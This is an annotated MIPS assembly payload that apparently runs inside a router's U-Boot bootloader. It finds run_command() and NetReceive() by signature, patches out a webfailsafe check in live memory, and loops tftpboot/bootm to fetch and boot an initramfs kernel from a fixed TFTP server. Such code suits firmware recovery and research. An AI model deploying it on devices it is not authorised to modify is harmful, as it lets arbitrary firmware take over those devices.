.section .text
# Entry block. MIPS, GNU as syntax; calls go through $t9 (la $t9 / jalr $ra,$t9),
# the usual MIPS PIC call sequence.
# Register roles across this block:
#   $s0 = address of run_command(), derived from a signature hit
#   $s1 = address of the word patched inside NetReceive()
# Both come from `search` (defined later in this file). search returns 0 on a
# miss and neither result is tested here, so on a miss the -20/+32 adjustments
# are applied to 0 and the code goes on to store through / jump through a
# bogus pointer. Everything below therefore depends on the signature tables
# and the ram_start/ram_end window matching the exact firmware build.
# NOTE(review): no explicit nops follow the jalr/jr.hb delay slots, so this
# file presumably relies on the assembler's default `.set reorder` — confirm
# no `.set noreorder` is in effect for this blob.
# locate run_command()
la $a0, b_run_command_signature  # $a0 = pattern bytes
li $a1, i_run_command_signature_size  # $a1 = pattern length (11 words = 44 bytes)
la $t9, search
jalr $ra, $t9  # $v0 = first matching address, or 0 (unchecked)
addi $s0, $v0, -20 #function starts 20 bytes before sig (5 instructions); addi traps on overflow, addiu is used for the same job below
# locate NetReceive()
la $a0, b_netreceive_signature
li $a1, i_netreceive_signature_size  # 6 words = 24 bytes
la $t9, search
jalr $ra, $t9  # $v0 = first matching address, or 0 (unchecked)
addiu $s1, $v0, 32 #branch instruction is 32 bytes after sig (8 instructions)
# patch NetReceive to replace webfailsafe_is_running check with noop
sw $zero, ($s1)  # the all-zero word 0x00000000 encodes `nop` (sll $zero,$zero,0)
nop
# need to flush instruction cache to use NetReceive patch immediately
synci 0($s1)  # MIPS32r2: write back the D-cache line and invalidate the I-cache line holding $s1
sync
la $t0, cleared
jr.hb $t0  # MIPS32r2 jump with hazard barrier: instruction fetch after this sees the new word
cleared:
# call run_command to setup ips
# Both calls pass flag = 0 in $a1; the server/board IPs are fixed in the
# strings in the data area, there is no discovery.
li $a1, 0x0
la $a0, s_setenv_serverip
move $t9, $s0
jalr $ra, $t9 # run_command("setenv serverip 192.168.0.2", 0)
li $a1, 0x0
la $a0, s_setenv_ipaddr
move $t9, $s0
jalr $ra, $t9 # run_command("setenv ipaddr 192.168.0.1", 0)
# call run_command to do tftp boot
# The loop is unconditional: run_command's return value in $v0 is never
# inspected, so a failing tftpboot or bootm simply retries forever.
loop:
li $a1, 0x0
la $a0, s_tftpboot
move $t9, $s0
jalr $ra, $t9 # run_command("tftpboot 0x82000000 initramfs-kernel.bin", 0)
li $a1, 0x0
la $a0, s_bootm
move $t9, $s0
jalr $ra, $t9 # run_command("bootm 0x82000000", 0)
b loop  # bootm only returns on failure; retry from the tftpboot step
# char* search(char* bytes, int bytes_len):
# search memory between ram_start and ram_end for
# bytes, returns first address whose contents match, or 0 if not found
# In:    $a0 = bytes (pattern), $a1 = bytes_len
# Out:   $v0 = first matching address, or 0
# Clobb: $t0-$t5, $v0, flags-free; $at is used by the bltu macro expansion.
#        No $s register is touched, which is what the caller relies on
#        ($s0/$s1 stay live across the two calls).
# Notes: candidates advance 4 bytes at a time starting at ram_start+4, so only
#        word-aligned matches are found and ram_start itself is never tested.
#        The inner compare is bounded only by bytes_len, not by ram_end, so the
#        last candidates may read up to bytes_len-1 bytes past ram_end.
#        bytes_len <= 0 behaves like 1: one byte is compared before the count
#        is checked.
# NOTE(review): branch delay slots carry no explicit nops, so this presumably
#        assembles under the default `.set reorder` — confirm.
search:
lw $t0, ram_start  # $t0 = candidate address (word-aligned)
search_outer_loop:
addiu $t0, 4  # pre-increment: next word-aligned candidate
lw $t1, ram_end  # reloaded on every pass (loop-invariant)
bltu $t0, $t1, search_inner_loop_init  # assembler macro (sltu $at + bne); unsigned compare
move $v0, $zero  # window exhausted: return NULL
jr $ra
search_inner_loop_init:
move $t1, $a1  # $t1 = bytes still to compare
move $t2, $a0  # $t2 = pattern cursor
move $t3, $t0  # $t3 = memory cursor
search_inner_loop_next:
lb $t4, 0($t2)  # both sides are sign-extended identically,
lb $t5, 0($t3)  # so equality is unaffected by the extension
bne $t4, $t5, search_outer_loop  # mismatch: abandon this candidate
addiu $t2, $t2, 1
addiu $t3, $t3, 1
addi $t1, $t1, -1  # addi traps on signed overflow; addiu is used elsewhere in this file — harmless at these lengths
bgtz $t1, search_inner_loop_next  # loop while bytes remain
move $v0, $t0  # every byte matched: return the candidate address
jr $ra
# --- data ---
# Everything here stays in .text so the blob is one contiguous image; it is
# only read (lw/la) by the code above, never written. `la`/`lw` of these
# labels presumably expand to absolute addresses (non-PIC), so the image has
# to be loaded at its link address — confirm against the loader.
# The 64-byte alignment of each item is not required by any access above;
# presumably chosen for cache-line sizing.
.balign 64
s_setenv_serverip:
.asciz "setenv serverip 192.168.0.2"  # U-Boot command string for run_command(); TFTP server address is fixed here
.balign 64
s_setenv_ipaddr:
.asciz "setenv ipaddr 192.168.0.1"  # board's own address, also fixed
.balign 64
s_tftpboot:
.asciz "tftpboot 0x82000000 initramfs-kernel.bin"  # load address and file name are fixed
.balign 64
s_bootm:
.asciz "bootm 0x82000000"  # boots whatever tftpboot placed at that address
.balign 64
# search window used by `search`: candidates run over [ram_start+4, ram_end),
# i.e. just under 1 MiB. These are target-specific — presumably the region
# the U-Boot image is relocated to on this device; confirm per firmware build.
ram_start:
.word 0x87f00000
ram_end:
.word 0x87ffff00
.balign 64
# Both signatures below decode as `sw $reg, off($sp)` (opcode 0x2B, rs = $sp):
# the callee-saved register spills of a function prologue. The stack offsets
# are properties of one compiled build, so the signatures pin this blob to a
# single firmware version; any other build makes `search` return 0.
b_run_command_signature:  # 11 words = 44 bytes
.word 0xAFBC0010  # sw $gp, 0x10($sp)
.word 0xAFB20688  # sw $s2, 0x688($sp)
.word 0xAFB10684  # sw $s1, 0x684($sp)
.word 0xAFB00680  # sw $s0, 0x680($sp)
.word 0xAFBF06A4  # sw $ra, 0x6a4($sp)
.word 0xAFBE06A0  # sw $fp, 0x6a0($sp)
.word 0xAFB7069C  # sw $s7, 0x69c($sp)
.word 0xAFB60698  # sw $s6, 0x698($sp)
.word 0xAFB50694  # sw $s5, 0x694($sp)
.word 0xAFB40690  # sw $s4, 0x690($sp)
.word 0xAFB3068C  # sw $s3, 0x68c($sp)
.set i_run_command_signature_size, .-b_run_command_signature  # = 44
.balign 64
b_netreceive_signature:  # 6 words = 24 bytes
.word 0xAFBF0034  # sw $ra, 0x34($sp)
.word 0xAFB50030  # sw $s5, 0x30($sp)
.word 0xAFB4002C  # sw $s4, 0x2c($sp)
.word 0xAFB30028  # sw $s3, 0x28($sp)
.word 0xAFB20024  # sw $s2, 0x24($sp)
.word 0xAFB0001C  # sw $s0, 0x1c($sp)
.set i_netreceive_signature_size, .-b_netreceive_signature  # = 24